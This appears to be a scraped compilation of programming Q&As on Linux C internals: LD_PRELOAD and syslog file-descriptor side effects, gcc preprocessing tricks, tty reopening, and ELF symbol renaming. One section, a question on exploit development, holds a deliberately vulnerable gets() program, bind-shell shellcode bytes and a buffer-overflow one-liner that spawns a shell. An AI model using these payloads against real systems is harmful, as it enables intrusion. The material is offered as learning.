LD_PRELOAD-ed open() + __xstat() + syslog() result in EBADF

I am on a Fedora 30 box with GLIBC 2.29 and kernel 5.2.18-200.fc30.x86_64
$ rpm -qf /usr/lib64/libc.so.6
glibc-2.29-28.fc30.x86_64
override.c :
#define open Oopen
#define __xstat __Xxstat
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdio.h>
#include <sys/stat.h>
#include <syslog.h>
#include <errno.h>
#undef open
#undef __xstat
#ifndef DEBUG
#define DEBUG 1
#endif
#define LOG(fmt, ...) \
do { \
if (DEBUG) { \
int errno_ = errno; \
/* fprintf(stderr, "override|%s: " fmt, __func__, __VA_ARGS__); */ \
syslog(LOG_INFO | LOG_USER, "override|%s: " fmt, __func__, __VA_ARGS__); \
errno = errno_; \
} \
} while (0)
/* Function pointers to hold the value of the glibc functions */
static int (*real_open)(const char *str, int flags, mode_t mode);
static int (*real___xstat)(int ver, const char *str, struct stat *buf);
int open(const char *str, int flags, mode_t mode) {
LOG("%s\n", str);
real_open = dlsym(RTLD_NEXT, __func__);
return real_open(str, flags, mode);
}
int __xstat(int ver, const char *str, struct stat *buf) {
LOG("%s\n", str);
real___xstat = dlsym(RTLD_NEXT, __func__);
return real___xstat(ver, str, buf);
}
It works in all cases I could think of, but not this one:
$ gcc -DDEBUG=1 -fPIC -shared -o liboverride.so override.c -ldl -Wall -Wextra -Werror
$ LD_PRELOAD=$PWD/liboverride.so bash -c "echo blah | xargs -I{} sh -c 'echo {} | rev'"
rev: stdin: Bad file descriptor
However, if I comment out syslog() in favour of fprintf(), it works:
$ gcc -DDEBUG=1 -fPIC -shared -o liboverride.so override.c -ldl -Wall -Wextra -Werror
$ LD_PRELOAD=$PWD/liboverride.so bash -c "echo blah | xargs -I{} sh -c 'echo {} | rev'"
override|open: /dev/tty
override|__xstat: /tmp/nwani_1587079071
override|__xstat: .
...
... yada ...
... yada ...
... yada ...
...
halb <----------------------------- !
...
... yada ...
... yada ...
... yada ...
override|__xstat: /usr/share/terminfo
So, my dear friends, how do I debug why using syslog() results in EBADF?
=========================================================================
Updates:
Unable to reproduce on Fedora 32-beta
The following command also reproduces the same problem:
$ LD_PRELOAD=$PWD/liboverride.so bash -c "echo blah | xargs -I{} sh -c 'echo {} | cat'"
Interestingly, if I replace cat with /usr/bin/cat the problem goes away.
=========================================================================
Update: Based on Carlos's answer, I ran a git bisect on findutils (xargs) and found that my scenario was (unintentionally?) fixed with a feature addition:
commit 40cd25147b4461979c0d992299f2c101f9034f7a
Author: Bernhard Voelker <mail@bernhard-voelker.de>
Date: Tue Jun 6 08:19:29 2017 +0200
xargs: add -o, --open-tty option
This option is available in the xargs implementation of FreeBSD, NetBSD,
OpenBSD and in the Apple variant. Add it for compatibility.
* xargs/xargs.c (open_tty): Add static flag for the new option.
(longopts): Add member.
(main): Handle the 'o' case in the getopt_long() loop.
(prep_child_for_exec): Redirect stdin of the child to /dev/tty when
the -o option is given. Furthermore, move the just-opened file
descriptor to STDIN_FILENO.
(usage): Document the new option.
* bootstrap.conf (gnulib_modules): Add dup2.
* xargs/xargs.1 (SYNOPSIS): Replace the too-long list of options by
"[options]" - they are listed later anyway.
(OPTIONS): Document the new option.
(STANDARDS CONFORMANCE): Mention that the -o option is an extension.
* doc/find.texi (xargs options): Document the new option.
(Invoking the shell from xargs): Amend the explanation of the
redirection example with a note about the -o option.
(Viewing And Editing): Likewise.
(Error Messages From xargs): Add the message when dup2() fails.
(NEWS): Mention the new option.
Fixes http://savannah.gnu.org/bugs/?51151

Your overridden open and __xstat must not have any side-effects that can be seen by the running process.
No process expects open or __xstat to close and reopen the lowest numbered file descriptor, nor that it should be opened O_CLOEXEC, but this is indeed what syslog does if it finds that the logging socket has failed.
The solution is that you must call closelog after calling syslog to avoid any side-effects becoming visible to the process.
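As a minimal sketch of that advice (the helper name log_and_close is made up for illustration, and the message format is simply copied from the question's LOG macro), the logging step could look like this:

```c
#include <errno.h>
#include <syslog.h>

/* Hypothetical helper: log one line, then release the syslog socket. */
void log_and_close(const char *func, const char *path)
{
    int saved_errno = errno;   /* syslog()/closelog() may change errno */

    syslog(LOG_INFO | LOG_USER, "override|%s: %s", func, path);
    closelog();                /* close the socket so no descriptor stays open */

    errno = saved_errno;       /* the wrapped call must see the caller's errno */
}
```

Calling closelog() after every message makes each call reconnect to the log socket, so this trades speed for not leaving a descriptor behind in the host process.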
The failure scenario looks like this:
xargs closes stdin.
xargs calls open or stat.
liboverride.so's logging calls syslog which opens a socket, and gets fd 0 as the socket fd.
xargs calls fork.
xargs calls dup2 to dup the right piped fd to stdin, and so overwrites fd 0 with the new stdin (the expectation is that nothing else could have opened fd 0)
xargs is about to call execve but...
xargs calls stat just before execve
liboverride.so's logging calls syslog and the implementation detects the sendto has failed, closes fd 0, and reopens fd 0 as the socket fd with O_CLOEXEC and logs a message.
xargs calls execve to run rev and the O_CLOEXEC socket fd, fd 0, is closed.
rev expects fd 0 to be stdin, but it is closed and so fails to read from it and writes an error message to that effect on stderr (which is still valid).
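The scenario above hinges on the rule that a newly opened descriptor gets the lowest free number. A small sketch of that rule, assuming a single-threaded process (the helper name reopen_after_close is hypothetical, and /dev/null merely stands in for the syslog socket):

```c
#include <fcntl.h>
#include <unistd.h>

/*
 * Hypothetical demonstration helper: close `fd`, then open /dev/null and
 * return whichever descriptor number the kernel hands out.
 */
int reopen_after_close(int fd)
{
    close(fd);
    return open("/dev/null", O_RDONLY);
}
```

If fd was the lowest descriptor in use, the new descriptor comes back with the same number. That is how the syslog socket ends up as fd 0 once xargs has closed stdin.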
When you write wrappers you must take care to avoid such side-effects. In this case it's relatively easy to use closelog, but that may not always be the case.
Depending on your version of xargs there may be more or less work done between the fork and exec and so it may work if liboverride.so's logging function is not called before the exec.

Related

How to show 'preprocessed' code ignoring includes with GCC

I'd like to know if it's possible to output 'preprocessed' code with gcc but 'ignoring' (not expanding) includes:
E.g., I have this main.c:
#include <stdio.h>
#define prn(s) printf("this is a macro for printing a string: %s\n", s);
int main(){
char str[5] = "test";
prn(str);
return 0;
}
I run gcc -E main.c -o out.c
I got:
/*
all stdio stuff
*/
int main(){
char str[5] = "test";
printf("this is a macro for printing a string: %s\n", str);
return 0;
}
I'd like to output only:
#include <stdio.h>
int main(){
char str[5] = "test";
printf("this is a macro for printing a string: %s\n", str);
return 0;
}
or, at least, just
int main(){
char str[5] = "test";
printf("this is a macro for printing a string: %s\n", str);
return 0;
}
PS: It would be great if it were possible to expand "local" ("") includes but not "global" (<>) includes.
I agree with Matteo Italia's comment that if you just prevent the #include directives from being expanded, then the resulting code won't represent what the compiler actually sees, and therefore it will be of limited use in troubleshooting.
Here's an idea to get around that. Add a variable declaration before and after your includes. Any variable that is reasonably unique will do.
int begin_includes_tag;
#include <stdio.h>
... other includes
int end_includes_tag;
Then you can do:
$ gcc -E main.c | sed '/begin_includes_tag/,/end_includes_tag/d' > out.c
The sed command will delete everything between those variable declarations.
When cpp expands includes it adds # directives (linemarkers) to trace back errors to the original files.
You can add a post processing step (it can be trivially written in any scripting language, or even in C if you feel like it) to parse just the linemarkers and filter out the lines coming from files outside of your project directory; even better, one of the flags (3) marks system header files (stuff coming from paths provided through -isystem, either implicitly by the compiler driver or explicitly), so that's something you could exploit as well.
For example in Python 3:
#!/usr/bin/env python3
import sys

skip = False
for l in sys.stdin:
    if not skip:
        sys.stdout.write(l)
    if l.startswith("# "):
        toks = l.strip().split(" ")
        linenum, filename = toks[1:3]
        flags = toks[3:]
        skip = "3" in flags
Using gcc -E foo.c | ./filter.py I get
# 1 "foo.c"
# 1 "<built-in>"
# 1 "<command-line>"
# 31 "<command-line>"
# 1 "/usr/include/stdc-predef.h" 1 3 4
# 1 "foo.c"
# 1 "/usr/include/stdio.h" 1 3 4
# 4 "foo.c"
int main(){
char str[5] = "test";
printf("this is a macro for printing a string: %s\n", str);;
return 0;
}
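Since the answer notes the filter could also be written in C, here is a rough sketch of the core test only: deciding whether a line is a linemarker that carries flag 3 (system header). The function name is_system_linemarker is made up for illustration, and the sketch assumes the marker layout shown in the output above (# number "file" flags).

```c
#include <stdlib.h>
#include <string.h>

/* Returns 1 if `line` is a linemarker carrying flag 3 (system header), else 0. */
int is_system_linemarker(const char *line)
{
    if (strncmp(line, "# ", 2) != 0)
        return 0;                          /* not a linemarker at all */

    const char *p = strrchr(line, '"');    /* closing quote of the file name */
    if (p == NULL)
        return 0;
    p++;

    /* The flags are the decimal numbers that follow the file name. */
    while (*p != '\0') {
        char *end;
        long flag = strtol(p, &end, 10);
        if (end == p)
            break;                         /* no further number on this line */
        if (flag == 3)
            return 1;
        p = end;
    }
    return 0;
}
```

A full filter would read lines from stdin, update a skip flag whenever this returns a new verdict for a linemarker, and print only the lines seen while skip is off, as the Python version does.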
Protect the #includes from getting expanded, run the preprocessor textually, remove the # 1 "<stdin>" etc. junk the textual preprocessor generates, and re-expose the protected #includes.
This shell function does it:
expand_cpp(){
    sed 's|^\([ \t]*#[ \t]*include\)|magic_fjdsa9f8j932j9\1|' "$@" \
    | cpp | sed 's|^magic_fjdsa9f8j932j9||; /^# [0-9]/d'
}
as long as you keep the include word together instead of doing crazy stuff like
#i\
ncl\
u??/
de <iostream>
(above you can see 2 backslash continuation lines + 1 trigraph (??/ == \ ) backslash continuation line).
If you wish, you can protect #ifs #ifdefs #ifndefs #endifs and #elses the same way.
Applied to your example
example.c:
#include <stdio.h>
#define prn(s) printf("this is a macro for printing a string: %s\n", s);
int main(){
char str[5] = "test";
prn(str);
return 0;
}
Run as expand_cpp < example.c or expand_cpp example.c, it generates:
#include <stdio.h>
int main(){
char str[5] = "test";
printf("this is a macro for printing a string: %s\n", str);;
return 0;
}
You can use -dI to show the #include directives and post-process the preprocessor output.
Assuming the name of your file is foo.c
SOURCEFILE=foo.c
gcc -E -dI "$SOURCEFILE" | awk '
/^# [0-9]* "/ { if ($3 == "\"'"$SOURCEFILE"'\"") show=1; else show=0; }
{ if(show) print; }'
or to suppress all # line_number "file" lines for $SOURCEFILE:
SOURCEFILE=foo.c
gcc -E -dI "$SOURCEFILE" | awk '
/^# [0-9]* "/ { ignore = 1; if ($3 == "\"'"$SOURCEFILE"'\"") show=1; else show=0; }
{ if(ignore) ignore=0; else if(show) print; }'
Note: The AWK scripts do not work for file names that include whitespace. To handle file names with spaces you could modify the AWK script to compare $0 instead of $3.
supposing the file is named c.c :
gcc -E c.c | tail -n +`gcc -E c.c | grep -n -e "#*\"c.c\"" | tail -1 | awk -F: '{print $1}'`
It seems # <number> "c.c" marks the lines after each #include.
Of course, you can also save the output of gcc -E c.c in a file to avoid running it twice.
The advantage is that you neither modify the source nor remove the #include directives before running gcc -E; this just removes all the lines from the top up to the last one produced by an #include, if I am right.
Many previous answers went in the direction of using the tracing # directives.
It's actually a one-liner in classical Unix (with awk):
gcc -E file.c | awk '/# [1-9][0-9]* "file.c"/ {skip=0; next} /# [1-9][0-9]* ".*"/ {skip=1} (skip<1) {print}'
TL;DR
Assign the file name to fname and run the following commands in a shell. Throughout this answer, fname is assumed to be an sh variable containing the source file to be processed.
fname=file_to_process.c ;
grep -G '^#include' <./"$fname" ;
grep -Gv '^#include[ ]*<' <./"$fname" | gcc -x c - -E -o - $(grep -G '^#include[ ]*<' <./"$fname" | xargs -I {} -- expr "{}" : '#include[ ]*<[ ]*\(.*\)[ ]*>' | xargs -I {} printf '-imacros %s ' "{}" ) | grep -Ev '^([ ]*|#.*)$'
All except gcc here is pure POSIX sh, no bashisms, or nonportable options. First grep is there to output #include directives.
GCC's -imacros
From gcc documentation:
-imacros file: Exactly like ‘-include’, except that any output produced by scanning file is
thrown away. Macros it defines remain defined. This allows you to acquire all
the macros from a header without also processing its declarations
So, what is -include anyway?
-include file: Process file as if #include "file" appeared as the first line of the primary
source file. However, the first directory searched for file is the preprocessor’s
working directory instead of the directory containing the main source file. If
not found there, it is searched for in the remainder of the #include "..."
search chain as normal.
Simply speaking, because you cannot use <> or "" in -include directive, it will always behave as if #include <file> were in source code.
First approach
ANSI C guarantees that assert is a macro, so it is perfect for a simple test:
printf 'int main(){\nassert(1);\nreturn 0;}\n' | gcc -x c -E - -imacros assert.h
Options -x c and - tell gcc that the language used is C and to read the source file from stdin. The output doesn't contain any declarations from assert.h, but there is still a mess that can be cleaned up with grep:
printf 'int main(){\nassert(1);\nreturn 0;}\n' | gcc -x c -E - -imacros assert.h | grep -Ev '^([ ]*|#.*)$'
Note: in general, gcc won't expand tokens that are intended to be macros but whose definition is missing. Nevertheless, assert happens to expand entirely: __extension__ is a GCC keyword, __assert_fail is a function, and __PRETTY_FUNCTION__ is a predefined identifier.
Automatisation
Previous approach works, but it can be tedious;
each #include needs to be deleted from file manually, and
it has to be added to gcc call as -imacros's argument.
First part is easy to script: pipe grep -Gv '^#include[ ]*<' <./"$fname" to gcc.
Second part takes some exercising (at least without awk):
2.1 Drop -v negative matching from previous grep command: grep -G '^#include[ ]*<' <./"$fname"
2.2 Pipe the previous command to expr inside xargs to extract the header name from each include directive: xargs -I {} -- expr "{}" : '#include[ ]*<[ ]*\(.*\)[ ]*>'
2.3 Pipe again to xargs, and printf with the -imacros prefix: xargs -I {} printf '-imacros %s ' "{}"
2.4 Enclose all in command substitution "$()" and place inside gcc.
Done. This is how you end up with the lengthy command from the beginning of my answer.
Solving subtle problems
This solution still has flaws: if local header files themselves contain global includes, those global includes will be expanded. One way to solve this problem is to use grep and sed to move all global includes out of the local headers and collect them in each *.c file.
printf '' > std ;
for header in *.h ; do
grep -G '^#include[ ]*<' <./$header >> std ;
sed -i '/#include[ ]*</d' $header ;
done;
for source in *.c ; do
cat std > tmp;
cat $source >> tmp;
mv -f tmp $source ;
done
Now the processing script can be called on any *.c file in the current directory without worrying that anything from the global includes will leak into the output. The final problem is duplication. Local headers that themselves include local headers might be duplicated, but this can only occur when headers aren't guarded, and in general every header should always be guarded.
Final version and example
To show these scripts in action, here is small demo:
File h1.h:
#ifndef H1H
#define H1H
#include <stdio.h>
#include <limits.h>
#define H1 printf("H1:%i\n", h1_int)
int h1_int=INT_MAX;
#endif
File h2.h:
#ifndef H2H
#define H2H
#include <stdio.h>
#include "h1.h"
#define H2 printf("H2:%i\n", h2_int)
int h2_int;
#endif
File main.c:
#include <assert.h>
#include "h1.h"
#include "h2.h"
int main(){
assert(1);
H1;
H2;
}
Final version of the script preproc.sh:
fname="$1"
printf '' > std ;
for source in *.[ch] ; do
grep -G '^#include[ ]*<' <./$source >> std ;
sed -i '/#include[ ]*</d' $source ;
sort -u std > std2;
mv -f std2 std;
done;
for source in *.c ; do
cat std > tmp;
cat $source >> tmp;
mv -f tmp $source ;
done
grep -G '^#include[ ]*<' <./"$fname" ;
grep -Gv '^#include[ ]*<' <./"$fname" | gcc -x c - -E -o - $(grep -G '^#include[ ]*<' <./"$fname" | xargs -I {} -- expr "{}" : '#include[ ]*<[ ]*\(.*\)[ ]*>' | xargs -I {} printf '-imacros %s ' "{}" ) | grep -Ev '^([ ]*|#.*)$'
Output of the call ./preproc.sh main.c:
#include <assert.h>
#include <limits.h>
#include <stdio.h>
int h1_int=0x7fffffff;
int h2_int;
int main(){
((void) sizeof ((
1
) ? 1 : 0), __extension__ ({ if (
1
) ; else __assert_fail (
"1"
, "<stdin>", 4, __extension__ __PRETTY_FUNCTION__); }))
;
printf("H1:%i\n", h1_int);
printf("H2:%i\n", h2_int);
}
This should always compile. If you really want to print every #include "file", then delete < from the grep pattern '^#include[ ]*<' in the 16-th line of preproc.sh, but be warned that the content of the headers will then be duplicated, and the code might fail to compile if the headers contain initialisation of variables. This is purposefully the case in my example to address the problem.
Summary
There are plenty of good answers here so why yet another? Because this seems to be unique solution with following properties:
Local includes are expanded
Global includes are discarded
Macros defined either in local or global includes are expanded
Approach is general enough to be usable not only with toy examples, but actually in small and medium projects that reside in a single directory.

Exploit Development - GETS and Shellcode

Trying to learn more about exploit dev and building shellcodes, but ran into an issue I don't understand the reason behind.
Why am I not able to run a shellcode such as execve("/bin/sh") and spawn a shell I can interact with?
While on the other hand, I'm able to create a reverse / bind_tcp shell and connect to it with netcat.
Sample program:
// gcc vuln.c -o vuln -m32 -fno-stack-protector -z execstack
#include <stdio.h>
#include <string.h>
void test() {
char pass[50];
printf("Password: ");
gets(pass);
if (strcmp(pass, "epicpassw0rd") == 0) {
printf("Woho, you got it!\n");
}
}
int main() {
test();
__asm__("movl $0xe4ffd4ff, %edx"); // jmp esp, call esp - POC
return(0);
}
Sample Exploit:
python -c "print 'A'*62 + '\x35\x56\x55\x56' + 'PAYLOAD'" | ./vuln
Sample Payload (working):
msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 LHOST="0.0.0.0" -f python
\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
Tested multiple different execve("/bin/sh") samples, as well as creating my own, then compiled them to verify they work before using it as payload.
Such as: https://www.exploit-db.com/exploits/42428/
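When the execve("/bin/sh") shellcode runs, the shell inherits the program's standard input, which is the pipe that gets() has already read from. That pipe is at end-of-file, so the shell reads EOF and terminates immediately.
The solution is to close the stdin descriptor and reopen /dev/tty before executing /bin/sh.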
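#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>

int main(void) {
    char buf[50];
    gets(buf);                            /* deliberately unsafe: consumes the piped input */
    printf("Yo %s\n", buf);
    close(0);                             /* drop the exhausted pipe */
    open("/dev/tty", O_RDWR | O_NOCTTY);  /* lowest free fd is 0, so this becomes stdin */
    execve("/bin/sh", NULL, NULL);
}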
Related answer: execve("/bin/sh", 0, 0); in a pipe
It is also possible to execute the payload by using
( python -c "print 'A'*62 + '\x35\x56\x55\x56' + '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"; cat ) | ./vuln

Bash reopen tty on simple program

#include <stdio.h>
#include <stdlib.h>
int main()
{
char buf[512];
fgets(buf, 512, stdin);
system("/bin/sh");
}
Compile with cc main.c
I would like a one-line command that makes this program run ls without it waiting for user input.
# This does not work - it prints nothing
(echo ; echo ls) | ./a.out
# This does work if you type ls manually
(echo ; cat) | ./a.out
I'm wondering:
Why doesn't the first example work?
What command would make the program run ls, without changing the source?
My question is shell and OS-agnostic but I would like it to work at least on bash 4.
Edit:
While testing out the answers, I found out that this works.
(python -c "print ''" ; echo ls) | ./a.out
Using strace:
$ (python -c "print ''" ; echo ls) | strace ./a.out
...
read(0, "\n", 4096)
...
This also works:
(echo ; sleep 0.1; echo ls) | ./a.out
It seems like the buffering is ignored. Is this due to the race condition?
strace shows what's going on:
$ ( echo; echo ls; ) | strace ./foo
[...]
read(0, "\nls\n", 4096) = 4
[...]
clone(child_stack=NULL, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0x7ffdefc88b9c) = 9680
In other words, your program reads a whole 4096 byte buffer that includes both lines before it runs your shell. It's fine interactively, because by the time the read happens, there's only one line in the pipe buffer, so over-reading is not possible.
You instead need to stop reading after the first \n, and the only way to do that is to read byte by byte until you hit it. I don't know libc well enough to know if this kind of functionality is supported, but here it is with read directly:
#include <unistd.h>
#include <stdlib.h>
int main()
{
char buf[1];
while((read(0, buf, 1)) == 1 && buf[0] != '\n');
system("/bin/sh");
}
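The same byte-at-a-time idea can be wrapped in a small reusable helper. This is only a sketch: the name read_line_fd and its return convention are invented here and are not part of libc.

```c
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper: read one line from `fd` a byte at a time, so nothing
 * beyond the first '\n' is consumed. Returns the number of bytes stored
 * (excluding the terminating NUL), or -1 on error.
 */
ssize_t read_line_fd(int fd, char *buf, size_t cap)
{
    size_t n = 0;

    if (cap == 0)
        return -1;
    while (n + 1 < cap) {
        char c;
        ssize_t r = read(fd, &c, 1);
        if (r < 0)
            return -1;      /* read error */
        if (r == 0)
            break;          /* end of file */
        buf[n++] = c;
        if (c == '\n')
            break;          /* stop right after the newline */
    }
    buf[n] = '\0';
    return (ssize_t)n;
}
```

Because it never reads past the newline, whatever follows (here the ls line) stays in the pipe for the shell started by system(). The cost is one system call per byte.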

avoid LD_PRELOAD: Wrap library and provide functionality requested from libc

I have a shared library, say somelib.so, which uses ioctl from libc (according to objdump).
My goal is to write a new library that wraps around somelib.so and provides a custom ioctl. I want to avoid preloading a library to ensure that only the calls in somelib.so use the custom ioctl.
Here is my current snippet:
typedef int (*entryfunctionFromSomelib_t) (int par, int opt);
typedef int (*ioctl_t) (int fd, int request, void *data);
ioctl_t real_ioctl = NULL;
int ioctl(int fd, int request, void *data )
{
fprintf( stderr, "trying to wrap ioctl\n" );
void *handle = dlopen( "libc.so.6", RTLD_NOW );
if (!handle)
fprintf( stderr, "Error loading libc.so.6: %s\n", strerror(errno) );
real_ioctl = (ioctl_t) dlsym( handle, "ioctl" );
return real_ioctl( fd, request, data);
}
int entryfunctionFromSomelib( int par, int opt ) {
void *handle = dlopen( "/.../somelib.so", RTLD_NOW );
if (!handle)
fprintf( stderr, "Error loading somelib.so: %s\n", strerror(errno) );
entryfunctionFromSomelib_t real_entryfunctionFromSomelib = (entryfunctionFromSomelib_t) dlsym( handle, "entryfunctionFromSomelib" );
return real_entryfunctionFromSomelib( par, opt );
}
However, it does not work in the sense that the calls to ioctl from somelib.so are not redirected to my custom ioctl implementation. How can I enforce that the wrapped somelib.so does so?
======================
Additional information added after @Nominal Animal's post:
Here is some information from mylib.so (somelib.so after edit) obtained via readelf -s | grep functionname:
246: 0000000000000000 121 FUNC GLOBAL DEFAULT UND dlsym@GLIBC_2.2.5 (11)
42427: 0000000000000000 121 FUNC GLOBAL DEFAULT UND dlsym@@GLIBC_2.2.5
184: 0000000000000000 37 FUNC GLOBAL DEFAULT UND ioctl@GLIBC_2.2.5 (6)
42364: 0000000000000000 37 FUNC GLOBAL DEFAULT UND ioctl@@GLIBC_2.2.5
After 'patching' mylib.so it also shows the new function as:
184: 0000000000000000 37 FUNC GLOBAL DEFAULT UND iqct1@GLIBC_2.2.5 (6)
I 'versioned' and exported the symbols from my wrap_mylib library for which readelf now shows:
25: 0000000000000d15 344 FUNC GLOBAL DEFAULT 12 iqct1@GLIBC_2.2.5
63: 0000000000000d15 344 FUNC GLOBAL DEFAULT 12 iqct1@GLIBC_2.2.5
However, when I try to dlopen wrap_mylib I get the following error:
symbol iqct1, version GLIBC_2.2.5 not defined in file libc.so.6 with link time reference
Is that maybe because mylib.so tries to dlsym iqct1 from libc.so.6 ?
If binutils' objcopy could modify dynamic symbols, and the mylib.so is an ELF dynamic library, we could use
mv mylib.so old.mylib.so
objcopy --redefine-sym ioctl=mylib_ioctl old.mylib.so mylib.so
to rename the symbol name in the library from ioctl to mylib_ioctl, so we could implement
int mylib_ioctl(int fd, int request, void *data);
in another library or object linked to the final binaries.
Unfortunately, this feature is not implemented (as of early 2017 at least).
We can solve this using an ugly hack, if the replacement symbol name is exactly the same length as the original name. The symbol name is a string (both preceded and followed by a nul byte) in the ELF file, so we can just replace it using e.g. GNU sed:
LANG=C LC_ALL=C sed -e 's|\x00ioctl\x00|\x00iqct1\x00|g' old.mylib.so > mylib.so
This replaces the name from ioctl() to iqct1(). It is obviously less than optimal, but it seems the simplest option here.
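For readers who would rather not push a binary through sed, the same same-length replacement can be sketched in C on an in-memory copy of the file. The function name rename_symbol is hypothetical, and reading and writing the file are left out.

```c
#include <stddef.h>
#include <string.h>

/*
 * Replace every NUL-delimited occurrence of `from` in buf[0..len) with `to`.
 * Both names must have the same length so that no offsets in the file move.
 * Returns the number of replacements made.
 */
size_t rename_symbol(unsigned char *buf, size_t len,
                     const char *from, const char *to)
{
    size_t n = strlen(from);
    size_t count = 0;

    if (n == 0 || strlen(to) != n || len < n + 2)
        return 0;

    for (size_t i = 0; i + n + 2 <= len; i++) {
        if (buf[i] == '\0' &&
            memcmp(buf + i + 1, from, n) == 0 &&
            buf[i + n + 1] == '\0') {
            memcpy(buf + i + 1, to, n);   /* overwrite the name in place */
            count++;
        }
    }
    return count;
}
```

Like the sed command, this only matches the name when it has a NUL byte on both sides, so a longer string that merely contains ioctl is left alone.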
If you find you need to add version information to the iqct1() function you implement, with GCC you can simply add a line similar to
__asm__(".symver iqct1,iqct1@GLIBC_2.2.5");
where the version follows the @ character.
Here is a practical example, showing how I tested this in practice.
First, let's create mylib.c, representing the sources for mylib.so (that the OP does not have -- otherwise just altering the sources and recompiling the library would solve the issue):
#include <unistd.h>
#include <errno.h>
int myfunc(const char *message)
{
int retval = 0;
if (message) {
const char *end = message;
int saved_errno;
ssize_t n;
while (*end)
end++;
saved_errno = errno;
while (message < end) {
n = write(STDERR_FILENO, message, (size_t)(end - message));
if (n > 0)
message += n;
else {
if (n == -1)
retval = errno;
else
retval = EIO;
break;
}
}
errno = saved_errno;
}
return retval;
}
The only function exported is myfunc(message), as declared in mylib.h:
#ifndef MYLIB_H
#define MYLIB_H
int myfunc(const char *message);
#endif /* MYLIB_H */
Let's compile the mylib.c into a dynamic shared library, mylib.so:
gcc -Wall -O2 -fPIC -shared mylib.c -Wl,-soname,libmylib.so -o mylib.so
Instead of write() from the C library (it's a POSIX function just like ioctl(), not a standard C one), we wish to use mywrt() of our own design in our own program. The above command saves the original library as mylib.so (while naming it internally as libmylib.so), so we can use
sed -e 's|\x00write\x00|\x00mywrt\x00|g' mylib.so > libmylib.so
to alter the symbol name, saving the modified library as libmylib.so.
Next, we need a test executable that provides the ssize_t mywrt(int fd, const void *buf, size_t count); function (the prototype being the same as that of the write(2) function it replaces). test.c:
#include <stdlib.h>
#include <stdio.h>
#include "mylib.h"
ssize_t mywrt(int fd, const void *buffer, size_t bytes)
{
printf("write(%d, %p, %zu);\n", fd, buffer, bytes);
return bytes;
}
__asm__(".symver mywrt,mywrt@GLIBC_2.2.5");
int main(void)
{
myfunc("Hello, world!\n");
return EXIT_SUCCESS;
}
The .symver line specifies version GLIBC_2.2.5 for mywrt.
The version depends on the C library used. In this case, I ran objdump -T $(locate libc.so) 2>/dev/null | grep -e ' write$', which gave me
00000000000f66d0 w DF .text 000000000000005a GLIBC_2.2.5 write
the second to last field of which is the version needed.
Because the mywrt symbol needs to be exported for the dynamic library to use, I created test.syms:
{
mywrt;
};
To compile the test executable, I used
gcc -Wall -O2 test.c -Wl,-dynamic-list,test.syms -L. -lmylib -o test
Because libmylib.so is in the current working directory, we need to add current directory to the dynamic library search path:
export LD_LIBRARY_PATH=$PWD:$LD_LIBRARY_PATH
Then, we can run our test binary:
./test
It will output something like
write(2, 0xADDRESS, 14);
because that's what the mywrt() function does. If we want to check the unmodified output, we can run mv -f mylib.so libmylib.so and rerun ./test, which will then output just
Hello, world!
This shows that this approach, although depending on very crude binary modification of the shared library file (using sed -- but only because objcopy does not (yet) support --redefine-sym on dynamic symbols), should work just fine in practice.
This is also a perfect example of how open source is superior to proprietary libraries: the amount of effort already spent in trying to fix this minor issue is at least an order of magnitude higher than it would have been to rename the ioctl call in the library sources to e.g. mylib_ioctl(), and recompile it.
Interposing dlsym() (from <dlfcn.h>, as standardized in POSIX.1-2001) in the final binary seems necessary in OP's case.
Let's assume the original dynamic library is modified using
sed -e 's|\x00ioctl\x00|\x00iqct1\x00|g;
s|\x00dlsym\x00|\x00d15ym\x00|g;' mylib.so > libmylib.so
and we implement the two custom functions as something like
int iqct1(int fd, unsigned long request, void *data)
{
    /* For OP to implement! */
}
__asm__(".symver iqct1,iqct1@GLIBC_2.2.5");

void *d15ym(void *handle, const char *symbol)
{
    if (!strcmp(symbol, "ioctl"))
        return iqct1;
    else
    if (!strcmp(symbol, "dlsym"))
        return d15ym;
    else
        return dlsym(handle, symbol);
}
__asm__(".symver d15ym,d15ym@GLIBC_2.2.5");
Do check the versions correspond to the C library you use. The corresponding .syms file for the above would contain just
{
iqct1;
d15ym;
};
otherwise the implementation should be as in the practical example shown earlier in this answer.
Because the actual prototype for ioctl() is int ioctl(int, unsigned long, ...);, there are no guarantees that this will work for all general uses of ioctl(). In Linux, the second parameter is of type unsigned long, and the third parameter is either a pointer or a long or unsigned long -- in all Linux architectures pointers and longs/unsigned longs have the same size --, so it should work, unless the driver implementing the ioctl() is also closed, in which case you are simply hosed, and limited to either hoping this works, or switching to other hardware with proper Linux support and open-source drivers.
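If you prefer the replacement to match the variadic prototype, a sketch along these lines may help. The name wrapped_ioctl is made up for illustration, and the code assumes, as discussed above, that the third argument is pointer-sized.

```c
#include <stdarg.h>
#include <sys/ioctl.h>

/* Hypothetical wrapper with the same variadic shape as ioctl(). */
int wrapped_ioctl(int fd, unsigned long request, ...)
{
    va_list ap;
    void *arg;

    va_start(ap, request);
    arg = va_arg(ap, void *);   /* assumes a pointer-sized third argument */
    va_end(ap);

    /* Custom handling would go here; this sketch just forwards the call. */
    return ioctl(fd, request, arg);
}
```

Callers should always pass a third argument (NULL if the request takes none), because the wrapper reads one unconditionally.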
The above special-cases both original symbols, and hard-wires them to the replaced functions. (I call these replaced instead of interposed symbols, because we really do replace the symbols the mylib.so calls with these ones, rather than interpose calls to ioctl() and dlsym().)
It is a rather brutish approach, but aside from using sed due to the lack of dynamic symbol redefinition support in objcopy, it is quite robust and clear as to what is done and what actually happens.

Why does using pipes with `who` cause mom not to like me?

